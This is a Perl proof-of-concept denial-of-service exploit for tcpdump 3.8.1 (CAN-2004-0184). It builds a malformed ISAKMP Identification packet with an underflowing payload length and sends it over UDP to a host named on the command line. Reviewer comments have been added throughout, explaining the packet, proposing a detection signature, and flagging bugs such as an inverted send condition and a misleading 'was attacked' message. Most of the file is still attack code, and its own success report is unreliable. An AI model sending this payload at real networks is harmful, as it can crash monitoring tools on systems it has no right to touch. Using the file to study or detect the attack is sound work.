#!/usr/bin/perl
#
# tcpdump packet sniffer.
# Integer underflow in ISAKMP Identification payload.
# Denial of service vulnerability
# Proof of concept code
# CVE-ID: CAN-2004-0184
#
# This vulnerability was found by:
# Rapid7, LLC Security Advisory.
#
# Vulnerable:
# - tcpdump 3.8.1
#
# Not vulnerable:
# - tcpdump 3.8.3
#
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 07/12/09.
#
# NOTE(review): the copy of this file that was indexed had every line
# collapsed onto one physical line; because `#` comments run to end of
# line in Perl, that collapsed form is a single comment and does nothing.
# The line breaks below are restored; no code token was changed.
#
# What the script does, for an analyst reading it: it builds one 36-byte
# ISAKMP datagram whose Identification payload carries a length field
# smaller than the bytes actually present, sends it once over UDP to the
# host named on the command line, and then waits (with a timeout) for any
# datagram back.  The affected component is a passive sniffer on the path
# (see the version list above), not the host the packet is addressed to,
# so nothing in the reply logic below can observe whether a sniffer was
# affected.

use IO::Socket;
use strict;
# NOTE(review): no `use warnings;` -- undef/uninitialised values (see the
# final print) are silent.

my $VERSAO = '0.1';

# All four signals are ignored, so the script cannot be interrupted with
# Ctrl-C, SIGHUP or a plain `kill`; only an un-ignorable signal stops it.
# With a single send/recv and a 5 s alarm this buys nothing.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';

# Prints the title banner.  The hex escapes are cosmetic obfuscation; the
# string decodes to:
#   "tcpdump packet sniffer / Integer underflow in ISAKMP Identification
#    payload. / Denial of Service.\nCoded by F-117.\n\n"
sub banner {
    print ("\x74\x63\x70\x64\x75\x6d\x70\x20\x70\x61\x63\x6b\x65\x74\x20\x73\x6e\x69\x66\x66\x65\x72\x20\x2f\x20\x49\x6e\x74\x65\x67\x65\x72\x20\x75\x6e\x64\x65\x72\x66\x6c\x6f\x77\x20\x69\x6e\x20\x49\x53\x41\x4b\x4d\x50\x20\x49\x64\x65\x6e\x74\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x20\x70\x61\x79\x6c\x6f\x61\x64\x2e\x20\x2f\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x2e\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
}

# The malformed ISAKMP datagram.  Total size is 28 (fixed ISAKMP header)
# + 8 (Identification payload) = 36 = 0x24, which matches the Length field,
# so the outer header is self-consistent; the malformation is confined to
# the payload's own length field.
#
# Detection angle: the generic payload header's length field (0x0005 here)
# is smaller than the 8 bytes the Identification payload actually occupies
# -- presumably smaller than the decoder's fixed ID-payload header size, so
# "length minus header" wraps (the underflow the advisory above describes;
# confirm against the advisory).  A payload length below the generic
# 4-byte payload header, or below the fixed part of the payload it names,
# is a usable signature for this class of packet.
my $evil_packet = ("\x00\x00\x00\x00\x00\x00\x00\x00". # Initiator cookie
    "\x00\x00\x00\x00\x00\x00\x00\x00". # Responder cookie
    "\x05". # Next payload: Identification
    "\x10". # Version: 1.0
    "\x01". # Exchange type
    "\x00". # Flags
    "\x00\x00\x00\x00". # Message ID
    "\x00\x00\x00\x24". # Length (36, consistent with the bytes below)
    # ISAKMP Identification payload
    "\x00". # Next payload: none
    "\x00". # Reserved
    "\x00\x05". # Payload length (incorrect: 5, but 8 bytes follow the header start)
    "\x20". # ID type (unknown)
    "\x00\x00\x00" # DOI
);

my($sock, $server_host, $msg, $port, $ipaddr, $hishost, $MAXLEN, $PORTNO, $TIMEOUT);
$MAXLEN = 1024;   # recv buffer size
$PORTNO = 5000;   # destination UDP port
$TIMEOUT = 5; # Change this!

# "@ARGV" interpolates ALL arguments joined by spaces, so more than one
# argument yields a host string like "a b" that the resolver will reject.
# No argument falls through to localhost.
$server_host = "@ARGV" || '127.0.0.1';
banner();
$msg = $evil_packet;
$sock = IO::Socket::INET->new(Proto => 'udp', PeerPort => $PORTNO, PeerAddr => $server_host);
# NOTE(review): the trailing `unless $sock` governs the WHOLE statement,
# so when IO::Socket::INET->new fails ($sock undef) the send is skipped
# silently and nothing is reported; the script then dies inside the eval
# below with "Can't call method recv on an undefined value", and the
# `or die` after the eval mislabels that as a timeout.  The `or die
# "[x] Error: $!"` branch is only reachable when send() itself fails on a
# valid socket.
$sock-> send($msg) or die "[x] Error: $!\n" unless $sock;
# Timed receive: the ALRM handler dies out of recv, eval catches it, and
# the eval's false return triggers the outer die.  Any die inside the
# block -- alarm, recv error, or the undefined-$sock case above -- is
# reported with the same "timed out" text; the original $@ is discarded.
eval {
    local $SIG{ALRM} = sub { die "[x] Alarm time out" };
    alarm $TIMEOUT;
    $sock->recv($msg, $MAXLEN) or die "[x] Received: $!";
    alarm 0;
    1; # return value from eval on normalcy
} or die "[x] Received from $server_host timed out after $TIMEOUT seconds.\n";
# Reverse-resolve the peer for the final message.  gethostbyaddr returns
# undef when there is no PTR record, in which case the line below prints
# an empty name (no warning, since `use warnings` is absent).
($port, $ipaddr) = sockaddr_in($sock->peername);
$hishost = gethostbyaddr($ipaddr, AF_INET);
# NOTE(review): reaching this line only means SOME datagram arrived from
# the peer within $TIMEOUT; it says nothing about a sniffer on the path,
# which sends nothing back.
print "[+] $hishost was attacked \n";